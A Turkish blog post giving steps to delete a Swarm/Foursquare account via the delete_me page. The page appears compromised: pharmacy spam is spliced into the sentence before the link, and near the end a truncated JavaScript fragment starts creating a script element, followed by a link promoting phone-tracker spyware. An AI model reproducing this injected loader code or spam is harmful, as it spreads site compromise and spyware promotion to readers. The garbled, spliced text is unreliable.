Swarm Hesabını Silme

swarm-hesap-silmeFoursquare tarafından geliştirilen yer bildirim uygulaması olan Swarm, android, ios ve windows phone akıllı telefonlarda check-in bildirimleri yapmak için kullanılmaktadır.

Çeşitli nedenlerden dolayı swarm hesabınızı silmek isteyebilirsiniz. Peki bu işlemi nasıl yapacağınızı biliyor musunuz ? Öncelikle swarm hesabınızı silmek için foursquare’da oturumunuzu açmanız gerekmektedir. Bilgisayarda , android, ios ya da windows phone bir cihazdan tarayıcıdan www.foursquare.com sitesine giriniz.

Siteye giriş yaptıktan sonra aşağıda sizler için paylaştığınız swarm hesap silme linkine tıklayınız.

low cost kamagr and viagra Link : https://tr.foursquare.com/delete_me

Yukarıda verilen linke tıkladıktan sonra swarm hesabınızı neden silmek istediğiniz ile ilgili bir ekran gelecektir. Buradan kendinize göre uygun bir seçeneği seçiniz.

Daha sonra sayfanın alt kısmında bulunan “Delete Account” butonuna basın ve böylece swarm hesabınızı başarıyla silmiş olacaksınız.

Foursquare hesabınız bulunmuyorsa ya da Swarm uygulamasını herhangi bir işletim sisteminde ki cihazınıza yüklediyseniz e-mail aktivasyonunu yapmamış olma ihtimaliniz yüksektir. Bu tarz durumlarda https://tr.foursquare.com/delete_me URL adresinden Swarm hesabını silme işlemine başladığınız zaman şifre oluşturmanızı isteyecektir.

Sayfa altında bulunan “şifre oluştur” linkine tıklayınız. Böylece kayıtlı olduğunuz mail adresinize şifreniz gönderilecektir. Eğer sistemde kayıtlı bir e-postanız yoksa profil sayfanıza yönlendirileceksiniz ve burada e-posta adresinizi tanımlamanız istenecektir. E-posta tanımlayıp şifrenizi alarak yukarıdaki adımları uygulayıp hesabınızı silebilirsiniz.

var d=document;var s=d.createElement(‘script’); http://demo.netzdesigno.com/viber-tracker-cell-phone-tracker-spyware-for-iphone/

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir